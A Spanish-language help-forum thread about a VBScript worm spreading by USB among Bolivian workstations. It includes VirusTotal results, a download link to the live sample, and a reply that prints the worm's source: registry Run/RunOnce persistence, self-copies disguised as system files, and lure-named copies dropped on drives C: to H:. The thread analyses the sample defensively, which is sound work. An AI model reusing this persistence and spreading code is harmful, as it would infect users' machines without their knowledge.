ayuda con este virus

Iniciado por darkangel2125, 9 Diciembre 2010, 02:14 AM

0 Miembros y 1 Visitante están viendo este tema.

darkangel2125

holas este virus esta circulando por el parlamento prefecturas y demas estaciones de trabajo de bolivia a nivel politico se llama evodesnudo.bmp.vbs es un script se transmite por usb y ahora q estamos a fin de año muchos estan entregando informes en flash o mandando archivos por internet pero automaticamente se copia a flash y al disco (por el nombre supongo q muchos gilipollas lo estan activando) lamentablemente soy nivel lamer y no puedo investigar q hace solo vi los efectos en algunos ordenadores; al encender la computadora  aparece una pantalla negra donde aparece el mensaje "falta ntdlr" y se queda hasta ahi por el momento tengo la laptop de mi madre contagiado (el script no esta activado) por desgracia mia y por prestarle el flash contagiado por envio de datos por blu too el celular contagiado y tengo q entregar mis informes q estan en mi flash pero al probar en otras computadoras (cafes y laboratorios de computacion) ocurre lo dicho al reinicio no se si ustedes me puedan decir con q antivirus combatirlo o por lo menos la manera de neutralizarlo puedo decir de como esta hecho en bolivia de fija es eliminable y debe tener minimo el 50% con bugs
me despido de antemano agradeciendo
el link de descarga es http://www.4shared.com/file/eVLMkFoS/EVO_DESNUDObmp.html

NOTA.-la mayoria q practica hack utiliza LINUXos no es con mala intension la subida del script Este script creo q trabaja con windows xp OS, como ya mencione no me se mucho de esto espero su ayuda
por si acaso un analisis en virustotal me dejo esto
File name: EVO DESNUDO.bmp.vbs
Submission date: 2010-12-09 00:54:51 (UTC)
Current status: queued queued analysing finished


Result: 4/ 43 (9.3%)
VT Community

not reviewed
Safety score: - 
Compact Print results Antivirus Version Last Update Result
AhnLab-V3 2010.12.09.00 2010.12.08 -
AntiVir 7.10.14.228 2010.12.08 -
Antiy-AVL 2.0.3.7 2010.12.08 -
Avast 4.8.1351.0 2010.12.08 -
Avast5 5.0.677.0 2010.12.08 -
AVG 9.0.0.851 2010.12.08 JS/Generic
BitDefender 7.2 2010.12.09 -
CAT-QuickHeal 11.00 2010.12.08 -
ClamAV 0.96.4.0 2010.12.09 -
Command 5.2.11.5 2010.12.08 -
Comodo 6996 2010.12.09 -
DrWeb 5.0.2.03300 2010.12.09 modification of VBS.Generic.358
Emsisoft 5.1.0.1 2010.12.08 -
eSafe 7.0.17.0 2010.12.07 -
eTrust-Vet 36.1.8027 2010.12.08 -
F-Prot 4.6.2.117 2010.12.08 -
F-Secure 9.0.16160.0 2010.12.09 -
Fortinet 4.2.254.0 2010.12.08 -
GData 21 2010.12.09 -
Ikarus T3.1.1.90.0 2010.12.08 -
Jiangmin 13.0.900 2010.12.08 -
K7AntiVirus 9.71.3191 2010.12.08 -
Kaspersky 7.0.0.125 2010.12.09 Type_Script
McAfee 5.400.0.1158 2010.12.09 -
McAfee-GW-Edition 2010.1C 2010.12.09 Heuristic.BehavesLike.VBS.Exploit.A
Microsoft 1.6402 2010.12.08 -
NOD32 5686 2010.12.08 -
Norman 6.06.12 2010.12.08 -
nProtect 2010-12-08.02 2010.12.08 -
Panda 10.0.2.7 2010.12.08 -
PCTools 7.0.3.5 2010.12.09 -
Prevx 3.0 2010.12.09 -
Rising 22.77.01.08 2010.12.08 -
Sophos 4.60.0 2010.12.09 -
SUPERAntiSpyware 4.40.0.1006 2010.12.09 -
Symantec 20101.2.0.161 2010.12.08 -
TheHacker 6.7.0.1.097 2010.12.08 -
TrendMicro 9.120.0.1004 2010.12.08 -
TrendMicro-HouseCall 9.120.0.1004 2010.12.09 -
VBA32 3.12.14.2 2010.12.08 -
VIPRE 7568 2010.12.09 -
ViRobot 2010.12.8.4191 2010.12.08 -
VirusBuster 13.6.82.0 2010.12.08 -
Additional informationShow all 
MD5   : d45d1cdc2cf5150328db17debd2ef8f6
SHA1  : e3f1cb39b5bd21fe87187d22d9325b09af5509b9
SHA256: 39420c9b217f3550c97334a942f679905d9cd7bb8130942891a86e48ef73cd79
esos antivirus q lo detectan no son muy comerciales a si q no tengo todavia respuesta creo q tendre q descargar pero me sentaria bien su ayuda aunq solo con unas respuestas como mencione gracias de antemano
Dulce caos

BlackZeroX

.

Por lo menos yo NO veo haga algo feo... tal ves es otra cosa...

Código (vb) [Seleccionar]


On Error Resume Next

Set Arios = wscript.CreateObject("WScript.Shell")
Set Sevicias = CreateObject("Scripting.FileSystemObject")

Set colDrives = Sevicias.Drives
Arios.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\", "Windows\system32\dllcache\Aedes.vbe"
Arios.regwrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\", "Windows\system32\dllcache\Taskmgr.vbe"
Arios.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\", "Windows\Fonts\Fonts.vbe"
ErigirElFichero = ".\\Fonts\\Fonts.vbe"
ErifirElficheross = ".\\System32\dllcache\\Aedes.vbe"
ErifirElficherosf = ".\\System32\\dllcache\\taskmgr.vbe"
ErifirElficheros = ".\\Master\\___.vbe"

Sevicias.copyfile wscript.scriptfullname, Sevicias.GetSpecialFolder(0) & ErigirElFichero
Sevicias.copyfile wscript.scriptfullname, Sevicias.GetSpecialFolder(0) & ErifirElficherosf
Sevicias.copyfile wscript.scriptfullname, Sevicias.GetSpecialFolder(0) & ErifirElficheross

Program_Area = "EVO DESNUDO.bmp.vbs"

Sevicias.copyfile Sevicias.GetSpecialFolder(0) & ErigirElFichero, "c:\" & Program_Area  'Master
Sevicias.copyfile Sevicias.GetSpecialFolder(0) & ErigirElFichero, "d:\" & Program_Area  'Master
Sevicias.copyfile Sevicias.GetSpecialFolder(0) & ErigirElFichero, "e:\" & Program_Area  'Master
Sevicias.copyfile Sevicias.GetSpecialFolder(0) & ErigirElFichero, "f:\" & Program_Area   'Master
Sevicias.copyfile Sevicias.GetSpecialFolder(0) & ErigirElFichero, "g:\" & Program_Area  'Master
Sevicias.copyfile Sevicias.GetSpecialFolder(0) & ErigirElFichero, "h:\" & Program_Area  'Master



Temibles Lunas!¡.
.
The Dark Shadow is my passion.

Novlucker

#2
Concuerdo, si realmente salta ese error en la pc y queda en negro es que se trata de otro virus, este no hace nada más que copiarse, e incluso eso lo hace mal :xD

Saludos
Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD

"Hay dos cosas infinitas: el Universo y la estupidez  humana. Y de la primera no estoy muy seguro."
Albert Einstein

darkangel2125

muchas gracias crei q habia alguien super o hack aqui pero nada, lo del script hasta yo lo entendi no mames no creo q sea peligroso
por lo del antivirus el macfee lo descubre pero al reinicio ahi esta
total gracias por su ayuda  ;-)
Dulce caos